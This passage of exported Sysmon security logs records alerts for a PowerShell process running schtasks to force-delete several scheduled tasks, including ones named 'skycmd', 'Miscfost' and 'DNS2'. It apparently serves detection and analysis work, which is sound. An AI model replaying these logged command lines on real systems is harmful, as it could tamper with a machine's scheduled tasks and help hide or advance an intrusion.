Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:36.469",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:08.165 +ProcessGuid: {df9fc3d3-b3f8-5ecf-0000-00101e022f00} +ProcessId: 7448 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Miscfost /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Miscfost /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:08.167473700Z"",""eventRecordID"":""3569"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:08.165\r\nProcessGuid: {df9fc3d3-b3f8-5ecf-0000-00101e022f00}\r\nProcessId: 7448\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Miscfost /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:08.165"",""processGuid"":""{df9fc3d3-b3f8-5ecf-0000-00101e022f00}"",""processId"":""7448"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Miscfost /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:36.437",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:08.137 +ProcessGuid: {df9fc3d3-b3f8-5ecf-0000-00107c002f00} +ProcessId: 7396 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN skycmd /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: 
Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN skycmd /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:08.139305100Z"",""eventRecordID"":""3568"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:08.137\r\nProcessGuid: {df9fc3d3-b3f8-5ecf-0000-00107c002f00}\r\nProcessId: 7396\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN skycmd /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:08.137"",""processGuid"":""{df9fc3d3-b3f8-5ecf-0000-00107c002f00}"",""processId"":""7396"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN skycmd /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:36.398",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:08.106 +ProcessGuid: {df9fc3d3-b3f8-5ecf-0000-001057fe2e00} +ProcessId: 7752 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN SYSTEMa /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEMa /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:08.109654800Z"",""eventRecordID"":""3567"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:08.106\r\nProcessGuid: {df9fc3d3-b3f8-5ecf-0000-001057fe2e00}\r\nProcessId: 7752\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEMa /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:08.106"",""processGuid"":""{df9fc3d3-b3f8-5ecf-0000-001057fe2e00}"",""processId"":""7752"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN SYSTEMa /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:36.376",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:08.068 +ProcessGuid: {df9fc3d3-b3f8-5ecf-0000-001000fc2e00} +ProcessId: 4788 +Image: C:\Windows\System32\schtasks.exe 
+FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DNS2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:08.071184800Z"",""eventRecordID"":""3566"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:08.068\r\nProcessGuid: {df9fc3d3-b3f8-5ecf-0000-001000fc2e00}\r\nProcessId: 4788\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS2 /F\r\nCurrentDirectory: 
C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:08.068"",""processGuid"":""{df9fc3d3-b3f8-5ecf-0000-001000fc2e00}"",""processId"":""4788"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DNS2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:36.323",14,"ATT&CK T1064: Windows 
Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:08.041 +ProcessGuid: {df9fc3d3-b3f8-5ecf-0000-001029fa2e00} +ProcessId: 5604 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN SYSTEM /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEM /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:08.043873400Z"",""eventRecordID"":""3565"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:08.041\r\nProcessGuid: {df9fc3d3-b3f8-5ecf-0000-001029fa2e00}\r\nProcessId: 5604\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration 
Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEM /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:08.041"",""processGuid"":""{df9fc3d3-b3f8-5ecf-0000-001029fa2e00}"",""processId"":""5604"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN SYSTEM /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:36.297",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:08.014 +ProcessGuid: {df9fc3d3-b3f8-5ecf-0000-001074f82e00} +ProcessId: 6300 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DNS /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:08.019366000Z"",""eventRecordID"":""3564"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:08.014\r\nProcessGuid: {df9fc3d3-b3f8-5ecf-0000-001074f82e00}\r\nProcessId: 6300\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:08.014"",""processGuid"":""{df9fc3d3-b3f8-5ecf-0000-001074f82e00}"",""processId"":""6300"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DNS /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 